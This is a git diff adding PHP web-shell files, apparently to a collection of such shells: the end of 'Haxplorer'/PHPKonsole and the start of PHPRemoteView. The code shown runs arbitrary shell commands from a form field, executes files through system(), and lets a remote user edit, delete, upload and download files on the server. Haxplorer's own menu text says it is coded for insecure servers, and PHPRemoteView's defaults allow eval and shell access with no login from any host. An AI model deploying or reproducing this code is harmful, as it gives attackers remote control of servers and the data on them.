/* <!-- Dirname --> */ + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n"; + /* <!-- Actions --> */ + echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n"; + /* <!-- Rename --> */ + if ( ($file != ".") && ($file != "..") ) + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* <!-- Delete --> */ + if ( ($file != ".") && ($file != "..") ) + echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* <!-- End of Actions --> */ + echo "&nbsp;&nbsp;</center></td>\n"; + /* <!-- Size --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n"; + /* <!-- Attributes --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n"; + echo "<strong>D</strong>"; + if ( @is_readable("$dir/$file") ) { + echo "<strong>R</strong>"; + } + if (function_exists('is_writeable')) { + if ( @is_writeable("$dir/$file") ) { + echo "<strong>W</stong>"; + } + } + else { + echo "<strong>(W)</stong>"; + } + if ( @is_executable("$dir/$file") ) { + echo "<Strong>X<strong>"; + } + echo "&nbsp;&nbsp;</td>\n"; + /* <!-- Date --> */ + echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n"; + echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;"; + echo "</td>"; + echo "</tr>\n"; + + } + else { /* <!-- Then it must be a File... --> */ + /* <!-- Filename --> */ + if ( @is_readable("$dir/$file") ) + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n"; + else + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n"; + /* <!-- Actions --> */ + echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n"; + /* <!-- Rename --> */ + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* <!-- Edit --> */ + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; + /* <!-- Copy --> */ + echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; + /* <!-- Move --> */ + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; + /* <!-- Delete --> */ + echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* <!-- Download --> */ + echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; + /* <!-- Execute --> */ + if ( @is_executable("$dir/$file") ) + echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; + /* <!-- End of Actions --> */ + echo sp(2)."</center></td>\n"; + /* <!-- Size --> */ + echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n"; + $size = @filesize("$dir/$file"); + If ($size != false) { + $filesizes += $size; + echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>"; + } + else + echo "&nbsp;&nbsp;<strong>0 B<strong>"; + echo "&nbsp;&nbsp;</td>\n"; + + /* <!-- Attributes --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n"; + + if ( @is_readable("$dir/$file") ) + echo "<strong>R</strong>"; + if ( @is_writeable("$dir/$file") ) + echo "<strong>W</stong>"; + if ( @is_executable("$dir/$file") ) + echo "<Strong>X<strong>"; + if (function_exists('is_uploaded_file')){ + if ( @is_uploaded_file("$dir/$file") ) + echo "<Strong>U<strong>"; + } + else { + echo "<Strong>(U)<strong>"; + } + echo "&nbsp;&nbsp;</td>\n"; + /* <!-- Date --> */ + echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n"; + echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;"; + echo "</td>"; + echo "</tr>\n"; + } + } + + echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n"; + echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n"; + echo "</td><td NOWRAP class=\"silver border noleft\">\n"; + echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n"; + + function printpagelink($a, $b, $link = ""){ + if ($link != "") + echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>"; + else + echo "<b>| $a - $b |</b>"; + } + + if ( count($filelist)-1 > $Pmax ) { + echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>"; + $Fi = 0; + while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = ($Fi + 1) * $Pmax - 1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + echo "&nbsp;&nbsp;&nbsp;"; + $Fi++; + } + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = count($filelist)-1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + + + echo "</center></td></tr></table></td></tr>"; + } + + + echo "</table>\n<br><table NOWRAP>"; + + if ($isGoodver) { + echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n"; + } + else { + echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n"; + } + /* <!-- Other Actions --> */ + echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n"; + echo "<td>&nbsp;<b>".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n"; + echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n"; + echo "<table NOWRAP>"; + echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n"; + echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n"; + echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n"; + echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n"; + echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n"; + echo "</table></td>"; + echo "</table>"; + echo "<br>"; + @closedir($h); + } + elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/ + echo system("$file"); + } +elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */ + echo "<center><table><tr><td NOWRAP>" ; + if ($auth == "yes") { + if (Mydeldir($file)==false) { + echo "Could not remove \"$file\"<br>Permission denied, or directory not empty..."; + } + else { + echo "Successfully removed \"$file\"<br>"; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>"; + } + else { + echo "Are you sure you want to delete \"$file\" and all it's subdirectories ? + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"deldir\"> + <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\"> + <input type=\"hidden\" name=\"file\" value=\"$file\"> + <input type=\"hidden\" name=\"auth\" value=\"yes\"> + <input type=\"submit\" value=\"Yes\"></form> + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>"; + } + echo "</td></tr></center>"; +} + elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ; + if ($auth == "yes") { + if (@unlink($file)==false) { + echo "Could not remove \"$file\"<br>"; + } + else { + echo "Successfully removed \"$file\"<br>"; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>"; + } + else { + echo "Are you sure you want to delete \"$file\" ? + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"delfile\"> + <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\"> + <input type=\"hidden\" name=\"file\" value=\"$file\"> + <input type=\"hidden\" name=\"auth\" value=\"yes\"> + + <input type=\"submit\" value=\"Yes\"></form> + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>"; + } + echo "</td></tr></center>"; +} +elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */ + echo "<center><table><tr><td NOWRAP>"; + $i = 1; + while (file_exists("$lastdir/newfile$i.txt")) + $i++; + $file = fopen("$lastdir/newfile$i.txt", "w+"); + if ($file == false) + echo "Could not create the new file...<br>"; + else + echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>"; + echo " + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"> + </form></center> + </td></tr></table></center> "; + } +elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */ + echo "<center><table><tr><td NOWRAP>" ; + $i = 1; + while (is_dir("$lastdir/newdir$i")) + $i++; + $file = mkdir("$lastdir/newdir$i", 0777); + if ($file == false) + echo "Could not create the new directory...<br>"; + else + echo "Successfully created: \"$lastdir/newdir$i\"<br>"; + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"> + </form></center></td></tr></table></center>"; +} +elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */ + $contents = ""; + $fc = @file( $file ); + while ( @list( $ln, $line ) = each( $fc ) ) { + $contents .= htmlentities( $line ) ; + } + echo "<br><center><table><tr><td NOWRAP>"; + echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n"; + echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n"; + echo "<strong>EDIT FILE: </strong>$file<br>\n"; + echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n"; + echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n"; + echo "<input type=\"submit\" value=\"Save\">"; + echo "</form>"; + echo "</td></tr></table></center>"; +} +elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */ + $fo = fopen($file, "w"); + $wrret = fwrite($fo, stripslashes($contents)); + $clret = fclose($fo); +} +elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */ + $downloadfile = urldecode($file); + if (function_exists("basename")) + $downloadto = basename ($downloadfile); + else + $downloadto = "download.ext"; + if (!file_exists("$downloadfile")) + echo "The file does not exist"; + else { + $size = @filesize("$downloadfile"); + if ($size != false) { + $add="; size=$size"; + } + else { + $add=""; + } + header("Content-Type: application/download"); + header("Content-Disposition: attachment; filename=$downloadto$add"); + $fp=fopen("$downloadfile" ,"rb"); + fpassthru($fp); + flush(); + } +} +elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ + ?> + <center> + <table> + <tr> + <td NOWRAP> + Welcome to the upload section... + Please note that the destination file will be + <br> overwritten if it already exists!!!<br><br> + <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post"> + <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776"> + <input type="hidden" name="cmd" value="uploadproc"> + <input type="hidden" name="dir" value="<?php echo $dir ?>"> + <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>"> + <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>"> + Select local file:<br> + <input size="75" name="userfile" type="file"><br> + <input type="submit" value="Send File"> + </form> + <br> + <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST"> + <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>"> + <input type="hidden" name="dir" value="<?php echo $lastdir ?>"> + <input tabindex="0" type="submit" value="Cancel"> + </form> + </td> + </tr> + </table> + </center> + + <?php +} +elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */ + echo "<center><table><tr><td NOWRAP>"; + if (file_exists($userfile)) + $res = copy($userfile, "$dir/$userfile_name"); + echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n"; + if ($res) { + echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>"; + echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>"; + echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>"; + } + else { + echo "Could not move uploaded file; Action aborted..."; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ; + echo "<br><br></td></tr></table></center>"; +} +elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */ + echo "<hr>"; + $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { + echo spacetonbsp(@htmlentities($line))."<br>\n"; + } + echo "<hr>"; +} +elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */ + if (function_exists('is_dir')) { + if (is_dir("$oldfile")) { + $objname = "Directory"; + $objident = "Directory"; + } + else { + $objname = "Filename"; + $objident = "file"; + } + } + echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n"; + If (empty($newfile) != true) { + echo "<center>"; + $return = @rename($oldfile, "$olddir$newfile"); + if ($return) { + echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\""; + } + else { + if ( @file_exists("$olddir$newfile") ) { + echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again..."; + } + else { + echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; + } + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ; + } + else { + $dpos = strrpos($oldfile, "/"); + if (strval($dpos)!="") { + $olddir = substr($oldfile, 0, $dpos+1); + } + else { + $olddir = "$lastdir/"; + } + $fpos = strrpos($oldfile, "/"); + if (strval($fpos)!="") { + $inputfile = substr($oldfile, $fpos+1); + } + else { + $inputfile = ""; + } + echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n"; + echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n"; + echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n"; + echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n"; + echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n"; + echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n"; + echo "Rename \"$oldfile\" to:<br>\n"; + echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; + echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>"; + echo "</td></tr></table></center>"; + } +} +else if ( $cmd == "con") { + +?> +<center> +<table> + <tr><td> +<h3>PHPKonsole</h3> + +<?php + +if (ini_get('register_globals') != '1') { + if (!empty($HTTP_POST_VARS)) + extract($HTTP_POST_VARS); + + if (!empty($HTTP_GET_VARS)) + extract($HTTP_GET_VARS); + + if (!empty($HTTP_SERVER_VARS)) + extract($HTTP_SERVER_VARS); + } + + if (!empty($work_dir)) { + if (!empty($command)) { + if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { + if ($regs[1][0] == '/') { + $new_dir = $regs[1]; + } else { + $new_dir = $work_dir . '/' . $regs[1]; + } + if (file_exists($new_dir) && is_dir($new_dir)) { + $work_dir = $new_dir; + } + unset($command); + } + } + } + if (file_exists($work_dir) && is_dir($work_dir)) { + chdir($work_dir); + } + $work_dir = exec('pwd'); +?> + + <form name="myform" action="<?php echo "$PHP_SELF?$urlAdd" ?>" method="post"> + <table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b> + <input type="hidden" name="cmd" value="con"> + <?php + $work_dir_splitted = explode('/', substr($work_dir, 1)); + printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr); + if (!empty($work_dir_splitted[0])) { + $path = ''; + for ($i = 0; $i < count($work_dir_splitted); $i++) { + $path .= '/' . $work_dir_splitted[$i]; + printf('<a href="%s?$urlAddcmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]); + } + } + ?></b></td> + <td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()"> + + <?php + $dir_handle = opendir($work_dir); + while ($dir = readdir($dir_handle)) { + if (is_dir($dir)) { + if ($dir == '.') { + echo "<option value=\"$work_dir\" selected>Current Directory</option>\n"; + } elseif ($dir == '..') { + if (strlen($work_dir) == 1) { + } + elseif (strrpos($work_dir, '/') == 0) { + echo "<option value=\"/\">Parent Directory</option>\n"; + } else { + echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n"; + } + } else { + if ($work_dir == '/') { + echo "<option value=\"$work_dir$dir\">$dir</option>\n"; + } else { + echo "<option value=\"$work_dir/$dir\">$dir</option>\n"; + } + } + } + } + closedir($dir_handle); + ?> + </select></td></tr></table> + <p>Command: <input class="inputtext" type="text" name="command" size="60"> + <input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p> + <p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if (($stderr) || (!isset($stderr)) ) echo " CHECKED"; ?>></p> + <textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php + if (!empty($command)) { + echo "phpKonsole> ". htmlspecialchars($command) . "\n\n"; + if ($stderr) { + $tmpfile = tempnam('/tmp', 'phpshell'); + $command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile"; + } else if ($command == 'ls') { + $command .= ' -F'; + } + $output = `$command`; + echo htmlspecialchars($output); + } + ?></textarea> + </form> + + <script language="JavaScript" type="text/javascript"> + document.forms[0].command.focus(); + </script> + </td></tr></table> +<?php +} +else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */ + $isMainMenu = true; + ?> + <table width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="border"> + <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center> + </td> + </tr> + </table> + <br> + <center> + <table border="0" NOWRAP> + <tr> + <td valign="top" class="silver border"> + <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> Haxplorer <==</strong></font>", "cmd=dir&dir=.").sp(2); ?> + </td> + <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP> + Haxplorer is a server side file browser wich (ab)uses the directory object to list + the files and directories stored on a webserver. This handy tools allows you to manage + files and directories on a unsecure server with php support.<br><br>This entire script + is coded for unsecure servers, if your server is secured the script will hide commands + or will even return errors to your browser...<br><br> + </td> + </tr> + <tr> + <td valign="top" class="silver border"> + <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> PHPKonsole <==</strong></font>", "cmd=con").sp(2); ?> + </td> + <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP> + <br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. + When you run commands they will run as the webservers UserID. This should work perfectly + for managing files, like moving, copying etc. If you're using a linux server, system commands + such as ls, mv and cp will be available for you... <br><br>This function will only work if the + server supports php and the execute commands...<br><br> + </td> + </tr> + </table> + </center> + <br> + <?php +} + +if ($cmd != "downl") { + if ( $isMainMenu != true) { + ?> + <table width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" style="class="silver border"> + <center><strong> + &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;] </font>", "cmd=&dir="); ?>&nbsp;&nbsp; + &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;PHPKonsole&nbsp;] </font>", "cmd=con"); ?>&nbsp;&nbsp; + &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Haxplorer&nbsp;] </font>", "cmd=dir&dir=."); ?> &nbsp;&nbsp; + </strong></center> + </td> + </tr> + </table> + <br> + <?php +} + ?> + <table width=100% border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="silver border"> + <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center> + </td> + </tr> + </table> + </td> + </tr> + </table> + + <?php + } + +?> diff --git a/php/PHPshell/PHP Shell/PHP Shell2.jpg b/php/PHPshell/PHP Shell/PHP Shell2.jpg new file mode 100644 index 0000000..ac7fb20 Binary files /dev/null and b/php/PHPshell/PHP Shell/PHP Shell2.jpg differ diff --git a/php/PHPshell/PHP Shell/PHP Shell3.jpg b/php/PHPshell/PHP Shell/PHP Shell3.jpg new file mode 100644 index 0000000..b66fa6e Binary files /dev/null and b/php/PHPshell/PHP Shell/PHP Shell3.jpg differ diff --git a/php/PHPshell/PHPRemoteView/PHPRemoteView.jpg b/php/PHPshell/PHPRemoteView/PHPRemoteView.jpg new file mode 100644 index 0000000..ff74d33 Binary files /dev/null and b/php/PHPshell/PHPRemoteView/PHPRemoteView.jpg differ diff --git a/php/PHPshell/PHPRemoteView/PHPRemoteView.php b/php/PHPshell/PHPRemoteView/PHPRemoteView.php new file mode 100644 index 0000000..4d6e436 --- /dev/null +++ b/php/PHPshell/PHPRemoteView/PHPRemoteView.php @@ -0,0 +1,2553 @@ +<?php + +/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + * + * Welcome to phpRemoteView (RemView) + * + * View/Edit remove file system: + * - view index of directory (/var/log - view logs, /tmp - view PHP sessions) + * - view name, size, owner:group, perms, modify time of files + * - view html/txt/image/session files + * - download any file and open on Notepad + * - create/edit/delete file/dirs + * - executing any shell commands and any PHP-code + * + * Free download from http://php.spb.ru/remview/ + * Version 04c, 2003-10-23. + * Please, report bugs... + * + * This programm for Unix/Windows system and PHP4 (or higest). + * + * (c) Dmitry Borodin, dima@php.spb.ru, http://php.spb.ru + * + * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * * + * + * --version4-- + * 2003.10.23 support short <?php ?> tags, thanks A.Voropay + * + * 2003.04.22 read first 64Kb of null-size file (example: /etc/zero), + * thanks Anight + * add many functions/converts: md5, decode md5 (pass crack), + * date/time, base64, translit, russian charsets + * fix bug: read session files + * + * 2002.08.24 new design and images + * many colums in panel + * sort & setup panel + * dir tree + * base64 encoding + * character map + * HTTP authentication with login/pass + * IP-address authentication with allow hosts + * + * --version3-- + * 2002.08.10 add multi language support (english and russian) + * some update + * + * 2002.08.05 new: full windows support + * fix some bugs, thanks Jeremy Flinston + * + * 2002.07.31 add file upload for create files + * add 'direcrory commands' + * view full info after safe_mode errors + * fixed problem with register_glogals=off in php.ini + * fixed problem with magic quotes in php.ini (auto strip slashes) + * + * --version2-- + * 2002.01.20 add panel 'TOOLS': eval php-code and run shell commands + * add panel 'TOOLS': eval php-code and run shell commands + * add copy/edit/create file (+panel 'EDIT') + * add only-read mode (disable write/delete and PHP/Shell) + * + * 2002.01.19 add delete/touch/clean/wipe file + * add panel 'INFO', view a/c/m-time, hexdump view + * add session file view mode (link 'SESSION'). + * + * 2002.01.12 first version! + * + * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ + +///////////////////////////////// S E T U P /////////////////////////////////// + + + $version="2003-10-23"; + + $hexdump_lines=8; // lines in hex preview file + $hexdump_rows=24; // 16, 24 or 32 bytes in one line + + $mkdir_mode=0755; // chmode for new dir ('MkDir' button) + + $maxsize_fread=65536; // read first 64Kb from any null-size file + + // USER ACCESS // + + $write_access=true; // true - user (you) may be write/delete files/dirs + // false - only read access + + $phpeval_access=true; // true - user (you) may be execute any php-code + // false - function eval() disable + + $system_access=true; // true - user (you) may be run shell commands + // false - function system() disable + + // AUTHORIZATION // + + $login=false; // Login & password for access to this programm. + $pass=false; // Example: $login="MyLogin"; $pass="MyPaSsWoRd"; + // Type 'login=false' for disable authorization. + + $host_allow=array("*"); // Type list of your(allow) hosts. All other - denied. + // Example: $host_allow=array("127.0.0.*","localhost") + + +/////////////////////////////////////////////////////////////////////////////// + + + $tmp=array(); + foreach ($host_allow as $k=>$v) + $tmp[]=str_replace("\\*",".*",preg_quote($v)); + $s="!^(".implode("|",$tmp).")$!i"; + if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) + exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - your host not allow</h1>\n"); + if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || + $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) { + header("WWW-Authenticate: Basic realm=\"phpRemoteView\""); + header("HTTP/1.0 401 Unauthorized"); + exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - password erroneous</h1>\n"); + } + + error_reporting(2047); + set_magic_quotes_runtime(0); + @set_time_limit(0); + @ini_set('max_execution_time',0); + @ini_set('output_buffering',0); + if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler"); + + $self=basename($HTTP_SERVER_VARS['PHP_SELF']); + + $url="http://".getenv('HTTP_HOST'). + (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : ""). + $HTTP_SERVER_VARS['PHP_SELF']. + (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : ""); + $uurl=urlencode($url); + + // + // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars; + // + $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ". + "ftype fnot c2 confirm text df df2 df3 df4 ref from to ". + "fatt showfile showsize root name ref names sort sortby ". + "datetime fontname fontname2 fontsize pan limit convert fulltime 